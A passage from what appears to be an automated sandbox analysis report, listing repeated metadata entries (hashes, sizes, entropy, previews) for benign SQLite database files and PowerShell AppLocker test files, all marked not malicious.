                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
